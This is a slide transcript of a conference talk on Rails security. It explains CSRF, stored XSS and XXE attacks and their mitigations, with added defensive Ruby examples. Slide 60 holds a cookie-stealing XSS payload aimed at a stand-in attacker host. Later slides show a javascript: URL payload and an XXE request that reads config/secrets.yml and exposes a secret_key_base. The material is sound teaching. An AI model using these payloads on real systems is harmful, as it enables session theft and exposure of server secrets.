
Security: Back to Basics

Presented at Abstractions - abstractions.io

The Internet is built on technology that was never meant to work together. Basic features of seemingly simple and innocuous technologies, such as XML, have resulted in hidden security flaws. In this session we'll talk about how attackers exploit common vulnerabilities like CSRF, XSS, and XXE. We'll explore how easy it is to introduce these vulnerabilities into your application and how to build software with security in mind.

Eileen M. Uchitelle

August 20, 2016

Transcript

  1. SECURITY
    Back to Basics

  2. (no slide text)

  3. EILEEN M. UCHITELLE
    eileencodes.com
    @eileencodes
    @eileencodes
    speakerdeck.com/eileencodes

  4. Kingston, NY
    Pittsburgh, PA

  5. Kingston, NY
    Pittsburgh, PA
    Canada
    Buffalo, NY

  6. Security, Infrastructure & Performance
    Team at Basecamp

  7. OPEN SOURCE
    Rails Committers
    Rails Security

  8. (no slide text)

  9. (no slide text)

  10. How is security broken?

  11. How is security broken?
    • Impossible to test for all possible vulnerabilities

  12. How is security broken?
    • Impossible to test for all possible vulnerabilities
    • Hackers are always one step ahead

  13. How is security broken?
    • Impossible to test for all possible vulnerabilities
    • Hackers are always one step ahead
    • Patching one vulnerability can lead to exposing new ones

  14. How did we get here?

  15. How did we get here?
    • Failed to enforce web standards

  16. vs.

  17. (no slide text)

  18. How did we get here?
    • Failed to enforce web standards
    • Failed to implement a definition of security

  19. “...completely failed to come up with even the most rudimentary usable frameworks for understanding the security of modern software.”
    – Michal Zalewski, The Tangled Web

  20. How did we get here?
    • Failed to enforce web standards
    • Failed to implement a definition of security
    • Too few people understand the vulnerabilities

  21. (no slide text)

  22. CSRF

  23. CSRF
    Cross-Site Request Forgery

  24. EXPLOITING CSRF

  25. (no slide text)

  26. ARYA
    The User

  27. JESSIE
    The Hacker
    ARYA
    The User

  28. (no slide text)

  29. (no slide text)

  30. Name
    Email
    Website

  31. (no slide text)

  32. Looks the same, different URL

  33. Name
    Email
    Website

  34. Name
    Email
    Website
    Jessie’s email

  35. Name
    Email
    Website
    Auto-submit form

  36. Name
    Email
    Website
    Auto-submit form to victim site

  37. Jessie’s email

  38. How dangerous are CSRF attacks?

  39. How can we protect our users from CSRF attacks?

  40. How to mitigate CSRF?
    • Use built-in framework CSRF protection

  41. (no slide text)

  42. class ApplicationController < ActionController::Base
      protect_from_forgery with: :exception
    end

  43. name="authenticity_token" />
    Name
    Email
    Website
    CSRF protection

  44. Caveat: CSRF protection in Rails is order-dependent

  45. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end

  46. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end
    Conditional authentication

  47. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end
    class ChatsController < ApplicationController
      skip_before_action :authenticate
      before_action :authenticate_for_chat, only: :create
    end

  48. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end
    class ChatsController < ApplicationController
      skip_before_action :authenticate
      before_action :authenticate_for_chat, only: :create
    end
    Skip auth callback

  49. >> ChatsController._process_action_callbacks.map(&:filter)
    => [:authenticate, :verify_authenticity_token, :authenticate_for_chat]
    Authentication callback is too late in the chain

  50. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end
    class ChatsController < ApplicationController
      skip_before_action :authenticate
      before_action :authenticate_for_chat, only: :create
      # redeclared here so verify_authenticity_token runs after authenticate_for_chat
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end

  51. >> ChatsController._process_action_callbacks.map(&:filter)
    => [:authenticate, :authenticate_for_chat, :verify_authenticity_token]
    Corrected callback order
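
The ordering problem on slides 44 to 51 is easier to see in a few lines of plain Ruby. The block below is an added example, not code from the talk or from Rails: MiniController is a stand-in that copies two rules of ActiveSupport's callback chain (a subclass inherits a copy of its parent's chain, and appending a filter that is already present removes the old entry and puts the filter at the end) and leaves everything else out, so a skipped filter simply disappears here rather than staying listed the way :authenticate does in the slide output. The state that the `if:` guard reads through authenticate_method is modelled as an instance variable set by the authentication callbacks.

```ruby
# Added example (not from the talk or from Rails): a minimal model of before_action
# ordering, enough to reproduce the chains on slides 49 and 51.
class MiniController
  # Each class keeps its own copy of the inherited chain, as class_attribute does in Rails.
  def self.callbacks
    @callbacks ||= (superclass.respond_to?(:callbacks) ? superclass.callbacks.dup : [])
  end

  # Appending a filter that is already in the chain drops the old entry and pushes the
  # filter to the end; this is the rule that makes slide 50's fix work.
  def self.before_action(filter)
    callbacks.delete(filter)
    callbacks.push(filter)
  end

  # Simplification: a skipped filter is removed outright.
  def self.skip_before_action(filter)
    callbacks.delete(filter)
  end

  # protect_from_forgery is, underneath, a before_action :verify_authenticity_token
  # carrying the `if:` guard from the slides.
  def self.protect_from_forgery
    before_action(:verify_authenticity_token)
  end

  def initialize
    @authenticate_method = nil
    @trace = []
  end

  # Runs the chain in order and records what each callback observed.
  def run
    self.class.callbacks.each { |filter| send(filter) }
    @trace
  end

  def authenticate
    @authenticate_method = :web
    @trace << [:authenticate, @authenticate_method]
  end

  def authenticate_for_chat
    @authenticate_method = :web
    @trace << [:authenticate_for_chat, @authenticate_method]
  end

  def verify_authenticity_token
    # nil here means the guard `authenticate_method.web?` would run before any
    # authentication callback has set authenticate_method.
    @trace << [:verify_authenticity_token, @authenticate_method]
  end
end

class ApplicationController < MiniController
  before_action :authenticate
  protect_from_forgery
end

# ChatsController as on slides 47/48: the new authentication callback lands after the CSRF check.
class ChatsControllerBroken < ApplicationController
  skip_before_action :authenticate
  before_action :authenticate_for_chat
end

# ChatsController as on slide 50: redeclaring protect_from_forgery moves the check back to the end.
class ChatsControllerFixed < ApplicationController
  skip_before_action :authenticate
  before_action :authenticate_for_chat
  protect_from_forgery
end

# What the CSRF guard sees when the given controller runs its chain (nil or :web).
def csrf_guard_sees(klass)
  klass.new.run.assoc(:verify_authenticity_token).last
end

if __FILE__ == $0
  p ChatsControllerBroken.callbacks, csrf_guard_sees(ChatsControllerBroken)
  p ChatsControllerFixed.callbacks, csrf_guard_sees(ChatsControllerFixed)
end
```

ChatsControllerBroken.callbacks gives the slide 49 order (without the skipped :authenticate) and csrf_guard_sees returns nil for it; ChatsControllerFixed.callbacks gives the slide 51 order and the guard sees :web.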

  52. (no slide text)

  53. How to mitigate CSRF?
    • Use built-in framework CSRF protection
    • Refresh tokens with the session / don’t reuse tokens

  54. class SessionsController < ApplicationController
      def destroy
        sign_out
        reset_session
        redirect_to sign_in_url
      end
    end
    Refreshes authenticity token

  55. How to mitigate CSRF?
    • Use built-in framework CSRF protection
    • Refresh tokens with the session / don’t reuse tokens
    • Mitigate XSS attacks

  56. XSS

  57. XSS
    Cross-Site Scripting

  58. EXPLOITING STORED XSS

  59. (no slide text)

  60. document.write(
      '<img src="http://www.hax0rcats.com/' + document.cookie + '">'
    );

  61. (no slide text)

  62. Escaped HTML

  63. Profile
    <%= notice %>
    Name:
    <%= @user.name %>
    Email:
    <%= @user.email %>
    Website:
    <%= link_to('website', @user.website) %>
    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>

  64. Profile
    <%= notice %>
    Name:
    <%= (@user.name).html_safe %>
    Email:
    <%= @user.email %>
    Website:
    <%= link_to('website', @user.website) %>
    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    (speaker notes) …automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To…

  65. (no slide text)

  66. JavaScript Scheme

  67. (no slide text)

  68. javascript://example.com/%0Aalert(1)

  69. javascript://example.com/%0Aalert(1)
    JavaScript scheme: javascript://

  70. javascript://example.com/%0Aalert(1)
    URL: example.com

  71. javascript://example.com/%0Aalert(1)
    Percent-encoded “line feed”: %0A

  72. javascript://example.com/%0Aalert(1)
    JavaScript alert: alert(1)

  73. How dangerous are XSS attacks?

  74. How can we protect our users from XSS attacks?

  75. How to mitigate XSS?
    • Always escape user-provided data

  76. Profile
    <%= notice %>
    Name:
    <%= (@user.name).html_safe %>
    Email:
    <%= @user.email %>
    Website:
    <%= link_to('website', @user.website) %>
    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Don’t do this

  77. (no slide text)

  78. How to mitigate XSS?
    • Don’t HTML escape user-provided data
    • Sanitize user-provided data

  79. Profile
    <%= notice %>
    Name:
    <%= sanitize(@user.name) %>
    Email:
    <%= @user.email %>
    Website:
    <%= link_to('website', @user.website) %>
    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Will strip out unwanted tags and attributes

  80. How to mitigate XSS?
    • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    • Validate user-provided data

  81. class User < ActiveRecord::Base
      WHITELISTED_URI_SCHEMES = %w( http https )
      validate :check_uri_scheme
      private
      def check_uri_scheme
        uri = URI.parse(website)
        # to_s guards against a nil scheme (e.g. "example.com"), which would otherwise raise on downcase
        unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.to_s.downcase)
          errors.add :website, 'is not an allowed URI scheme'
        end
      rescue URI::InvalidURIError
        errors.add :website, 'is not a valid URI'
      end
    end

  82. (same code as slide 81)

  83. (same code as slide 81)
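
Slides 75 to 83 come down to two checks: escape what you render, and validate the scheme of anything that becomes an href. The block below is an added example rather than code from the talk; it keeps the same allow-list and error messages as User#check_uri_scheme but runs outside Rails, with CGI.escapeHTML standing in for the escaping ERB applies to <%= %> automatically, and website_error returning the message the validator would add (nil when the value passes). It also handles the input a naive scheme check trips over: a relative URL such as example.com parses with a nil scheme.

```ruby
require "uri"
require "cgi"

# Added example (not from the talk): the scheme allow-list and the output escaping
# from the XSS slides as plain Ruby functions.
ALLOWED_URI_SCHEMES = %w(http https).freeze

# Returns nil when the website value is acceptable, otherwise the validation message
# that User#check_uri_scheme adds to the record.
def website_error(website)
  uri = URI.parse(website.to_s)
  # "example.com" or "" parse with a nil scheme, so compare via to_s instead of
  # calling downcase on nil. Upper-case schemes are folded before the comparison.
  return "is not an allowed URI scheme" unless ALLOWED_URI_SCHEMES.include?(uri.scheme.to_s.downcase)
  nil
rescue URI::InvalidURIError
  "is not a valid URI"
end

# What <%= @user.name %> renders: markup inside the name becomes visible text, not a tag.
def escaped_name(name)
  CGI.escapeHTML(name.to_s)
end

# Constructed sample input: the javascript: URL from the slides, an upper-case
# variant, an ordinary link, a relative URL and a malformed one.
SAMPLE_WEBSITES = [
  "javascript://example.com/%0Aalert(1)",
  "JAVASCRIPT:alert(1)",
  "https://eileencodes.com",
  "example.com",
  "http://exa mple.com",
].freeze

if __FILE__ == $0
  SAMPLE_WEBSITES.each { |site| puts "#{site.inspect}: #{website_error(site) || 'ok'}" }
  puts escaped_name("<b>Arya</b>")
end
```

Only the https link passes; the two javascript: forms and the relative URL are rejected as disallowed schemes, and the URL with a space is reported as not a valid URI.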

  84. XXE

  85. XXE
    XML eXternal Entity Attack

  86. ]>
    Take a nap
    Go on a long walk with my hooman
    &ext1;
    Take another nap
    Go to bed

  87. ]>
    Take a nap
    Go on a long walk with my hooman
    &ext1;
    Take another nap
    Go to bed
    Entity reference

  88. Eat breakfast
    Bark at the mail carrier

  89. Take a nap
    Go on a long walk with my hooman
    Eat breakfast
    Bark at the mail carrier
    Take another nap
    Go to bed

  90. EXPLOITING XXE

  91. class UsersController < ApplicationController
      def create
        @user = User.new(user_params)
        respond_to do |format|
          if @user.save
            format.html { redirect_to @user }
            format.xml { render xml: @user.to_xml }
          else
            format.html { render :new }
            format.xml { render xml: @user.errors.to_xml }
          end
        end
      end
    end

  92. (same code as slide 91)
    XML

  93. config/secrets.yml">
    ]>
    &name;

  94. config/secrets.yml">
    ]>
    &name;
    Requested file

  95. config/secrets.yml">
    ]>
    &name;
    Entity reference

  96. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml
    POST request to users create

  97. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml
    Payload

  98. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml
    ...
    production:
      secret_key_base: 271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c4000e166a9a5
    ...
    secrets.yml as user’s name

  99. (no slide text)

  100. How dangerous are XXE attacks?

  101. (no slide text)

  102. How can we protect our servers from XXE attacks?

  103. How to mitigate XXE?
    • Don’t parse XML

  104. Don’t parse XML

  105. How to mitigate XXE?
    • Don’t parse XML
    • Don’t use parsers that allow entity replacement (LibXML)

  106. >> LibXML::XML.default_substitute_entities
    >> true

  107. How to mitigate XXE?
    • Don’t parse XML
    • Don’t use parsers that allow entity replacement (LibXML)
    • Whitelist known entities
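
One way to act on the last two bullets when XML input cannot be avoided entirely. The block below is an added example, not code from the talk: it refuses any document that declares a DTD before a parser sees it, because entities (external or otherwise) can only be declared inside a DOCTYPE, and then parses the dog schedule from slides 86 to 89 with Ruby's bundled REXML. The sample documents are constructed for the example and the SYSTEM entity points at a placeholder path, not a real file. The gate is meant as defence in depth in front of the parser setting on slide 106 (default_substitute_entities turned off), not as a replacement for it.

```ruby
require "rexml/document"

# Added example (not from the talk): reject DTD-bearing XML before parsing it.
class UnsafeXML < StandardError; end

# XML keywords are case-sensitive, so the upper-case forms are the only valid spellings.
DTD_MARKERS = [/<!DOCTYPE/, /<!ENTITY/].freeze

# true when the text contains no DTD or entity declaration at all. Run it on the
# decoded String, not on raw bytes, so a differently encoded body cannot slip past it.
def dtd_free?(xml)
  DTD_MARKERS.none? { |marker| xml.match?(marker) }
end

# Parses a dog schedule (the <item> list from the slides) and returns the item texts,
# raising UnsafeXML instead of parsing when a DTD is present.
def parse_schedule(xml)
  raise UnsafeXML, "documents with a DTD are not accepted" unless dtd_free?(xml)
  doc = REXML::Document.new(xml)
  doc.elements.to_a("schedule/item").map(&:text)
end

# true when the document was accepted and parsed, false when the gate rejected it.
def accepted?(xml)
  parse_schedule(xml)
  true
rescue UnsafeXML
  false
end

# Constructed input: the schedule without any entities.
SAFE_SCHEDULE = <<~XML
  <schedule>
    <item>Take a nap</item>
    <item>Go on a long walk with my hooman</item>
    <item>Take another nap</item>
    <item>Go to bed</item>
  </schedule>
XML

# Constructed input: the same document carrying an external entity declaration that
# points at a placeholder path; parse_schedule must refuse it without reading anything.
XXE_SCHEDULE = <<~XML
  <!DOCTYPE schedule [
    <!ENTITY ext1 SYSTEM "file:///PLACEHOLDER/config/secrets.yml">
  ]>
  <schedule>
    <item>&ext1;</item>
  </schedule>
XML

if __FILE__ == $0
  p parse_schedule(SAFE_SCHEDULE)
  p accepted?(XXE_SCHEDULE)
end
```

parse_schedule returns the four schedule items for the entity-free document and raises UnsafeXML for the one with the DOCTYPE, so the placeholder path is never opened.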

  108. SECURITY
    Investigate vulnerabilities & patches

  109. GitHub: eileencodes/security_examples

  110. owasp.org

  111. (no slide text)

  112. Brakeman

  113. SECURITY
    Resilience & empowerment

  114. (no slide text)

  115. SECURITY
    Awareness of vulnerabilities

  116. JESSIE
    The Hacker
    ARYA
    The User

  117. (no slide text)

  118. To the future

  119. Thank You!
    Come find me for questions and Basecamp stickers

  120. EILEEN M. UCHITELLE
    Security, Infrastructure & Performance Team at Basecamp
    eileencodes.com
    @eileencodes
    @eileencodes
    speakerdeck.com/eileencodes